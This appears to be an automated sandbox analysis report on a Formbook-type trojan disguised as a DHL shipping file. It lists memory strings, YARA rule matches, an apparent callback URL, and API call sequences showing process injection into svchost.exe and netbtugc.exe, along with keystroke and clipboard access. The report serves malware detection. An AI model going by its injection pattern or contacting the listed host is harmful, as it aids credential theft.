            Source: netbtugc.exe, 00000004.00000002.4529839998.000000000322B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.4529839998.000000000322B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000004.00000002.4529839998.000000000322B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.4529839998.000000000322B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000003.2394971001.0000000007F64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000004.00000002.4532618165.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.4530981261.00000000051FA000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.0000000003EDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?UzG=mxnR
            Source: netbtugc.exe, 00000004.00000002.4530981261.000000000488E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4532489216.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.000000000356E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.000000000356E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0094425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0094425A
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00944458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00944458
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0094425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0094425A
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00930219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00930219
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0095CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0095CDAC

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: This is a third-party compiled AutoIt script.0_2_008D3B4C
            Source: DHL 806-232024.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: DHL 806-232024.exe, 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4b0c97a9-1
            Source: DHL 806-232024.exe, 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6730f8f6-b
            Source: DHL 806-232024.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_81801f33-3
            Source: DHL 806-232024.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d12ecab3-0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0034B363 NtClose,2_2_0034B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00321D09 NtProtectVirtualMemory,2_2_00321D09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B60 NtClose,LdrInitializeThunk,2_2_02F72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_02F72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_02F72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk,2_2_02F735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74340 NtSetContextThread,2_2_02F74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74650 NtSuspendThread,2_2_02F74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AF0 NtWriteFile,2_2_02F72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AD0 NtReadFile,2_2_02F72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AB0 NtWaitForSingleObject,2_2_02F72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BF0 NtAllocateVirtualMemory,2_2_02F72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BE0 NtQueryValueKey,2_2_02F72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BA0 NtEnumerateValueKey,2_2_02F72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B80 NtQueryInformationFile,2_2_02F72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EE0 NtQueueApcThread,2_2_02F72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EA0 NtAdjustPrivilegesToken,2_2_02F72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E80 NtReadVirtualMemory,2_2_02F72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E30 NtWriteVirtualMemory,2_2_02F72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FE0 NtCreateFile,2_2_02F72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FB0 NtResumeThread,2_2_02F72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FA0 NtQuerySection,2_2_02F72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F90 NtProtectVirtualMemory,2_2_02F72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F60 NtCreateProcessEx,2_2_02F72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F30 NtCreateSection,2_2_02F72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CF0 NtOpenProcess,2_2_02F72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CC0 NtQueryVirtualMemory,2_2_02F72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CA0 NtQueryInformationToken,2_2_02F72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C60 NtCreateKey,2_2_02F72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C00 NtQueryInformationProcess,2_2_02F72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DD0 NtDelayExecution,2_2_02F72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DB0 NtEnumerateKey,2_2_02F72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D30 NtUnmapViewOfSection,2_2_02F72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D10 NtMapViewOfSection,2_2_02F72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D00 NtSetInformationFile,2_2_02F72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73090 NtSetValueKey,2_2_02F73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73010 NtOpenDirectoryObject,2_2_02F73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F739B0 NtGetContextThread,2_2_02F739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D70 NtOpenThread,2_2_02F73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D10 NtOpenProcessToken,2_2_02F73D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03714340 NtSetContextThread,LdrInitializeThunk,4_2_03714340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03714650 NtSuspendThread,LdrInitializeThunk,4_2_03714650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712B60 NtClose,LdrInitializeThunk,4_2_03712B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03712BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712BE0 NtQueryValueKey,LdrInitializeThunk,4_2_03712BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_03712BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712AF0 NtWriteFile,LdrInitializeThunk,4_2_03712AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712AD0 NtReadFile,LdrInitializeThunk,4_2_03712AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712F30 NtCreateSection,LdrInitializeThunk,4_2_03712F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712FE0 NtCreateFile,LdrInitializeThunk,4_2_03712FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712FB0 NtResumeThread,LdrInitializeThunk,4_2_03712FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712EE0 NtQueueApcThread,LdrInitializeThunk,4_2_03712EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_03712E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_03712D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03712D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03712DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712DD0 NtDelayExecution,LdrInitializeThunk,4_2_03712DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03712C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712C60 NtCreateKey,LdrInitializeThunk,4_2_03712C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03712CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037135C0 NtCreateMutant,LdrInitializeThunk,4_2_037135C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037139B0 NtGetContextThread,LdrInitializeThunk,4_2_037139B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712B80 NtQueryInformationFile,4_2_03712B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712AB0 NtWaitForSingleObject,4_2_03712AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712F60 NtCreateProcessEx,4_2_03712F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712FA0 NtQuerySection,4_2_03712FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712F90 NtProtectVirtualMemory,4_2_03712F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712E30 NtWriteVirtualMemory,4_2_03712E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712EA0 NtAdjustPrivilegesToken,4_2_03712EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712D00 NtSetInformationFile,4_2_03712D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712DB0 NtEnumerateKey,4_2_03712DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712C00 NtQueryInformationProcess,4_2_03712C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712CF0 NtOpenProcess,4_2_03712CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03712CC0 NtQueryVirtualMemory,4_2_03712CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03713010 NtOpenDirectoryObject,4_2_03713010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03713090 NtSetValueKey,4_2_03713090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03713D70 NtOpenThread,4_2_03713D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03713D10 NtOpenProcessToken,4_2_03713D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DD7A70 NtReadFile,4_2_02DD7A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DD7BE0 NtClose,4_2_02DD7BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DD7B50 NtDeleteFile,4_2_02DD7B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DD7920 NtCreateFile,4_2_02DD7920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DD7D30 NtAllocateVirtualMemory,4_2_02DD7D30
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_009340B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_009340B1
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00928858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00928858
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0093545F
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008FDBB50_2_008FDBB5
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0095804A0_2_0095804A
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008DE0600_2_008DE060
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008E41400_2_008E4140
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008F24050_2_008F2405
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_009065220_2_00906522
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0090267E0_2_0090267E
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_009506650_2_00950665
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008DE8000_2_008DE800
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008F283A0_2_008F283A
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008E68430_2_008E6843
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_009089DF0_2_009089DF
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00906A940_2_00906A94
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00950AE20_2_00950AE2
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008E8A0E0_2_008E8A0E
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00938B130_2_00938B13
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0092EB070_2_0092EB07
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008FCD610_2_008FCD61
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_009070060_2_00907006
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008E31900_2_008E3190
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008E710E0_2_008E710E
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008D12870_2_008D1287
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008F33C70_2_008F33C7
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008FF4190_2_008FF419
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008E56800_2_008E5680
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008F16C40_2_008F16C4
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008E58C00_2_008E58C0
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008F78D30_2_008F78D3
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008F1BB80_2_008F1BB8
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00909D050_2_00909D05
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008DFE400_2_008DFE40
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008F1FD00_2_008F1FD0
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008FBFE60_2_008FBFE6
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00E505F80_2_00E505F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003368732_2_00336873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003368712_2_00336871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003228A02_2_003228A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003211102_2_00321110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003301732_2_00330173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0032E1F32_2_0032E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003212902_2_00321290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003235002_2_00323500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003226A02_2_003226A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003226982_2_00322698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0032268A2_2_0032268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0032FF532_2_0032FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0034D7532_2_0034D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0032FF4A2_2_0032FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC02C02_2_02FC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE02742_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030003E62_2_030003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F02_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA3522_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030001AA2_2_030001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD20002_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF81CC2_2_02FF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC81582_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA1182_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F301002_2_02F30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C6E02_2_02F5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C02_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F407702_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F647502_2_02F64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEE4F62_2_02FEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030005912_2_03000591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF24462_2_02FF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F405352_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA802_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF6BD72_2_02FF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFAB402_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E8F02_2_02F6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F268B82_2_02F268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300A9A62_2_0300A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4A8402_2_02F4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F428402_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A02_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F569622_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEEDB2_2_02FFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52E902_2_02F52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFCE932_2_02FFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40E592_2_02F40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEE262_2_02FFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4CFE02_2_02F4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32FC82_2_02F32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBEFA02_2_02FBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4F402_2_02FB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60F302_2_02F60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F82F282_2_02F82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30CF22_2_02F30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0CB52_2_02FE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40C002_2_02F40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3ADE02_2_02F3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F58DBF2_2_02F58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDCD1F2_2_02FDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4AD002_2_02F4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE12ED2_2_02FE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B2C02_2_02F5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F452A02_2_02F452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F8739A2_2_02F8739A
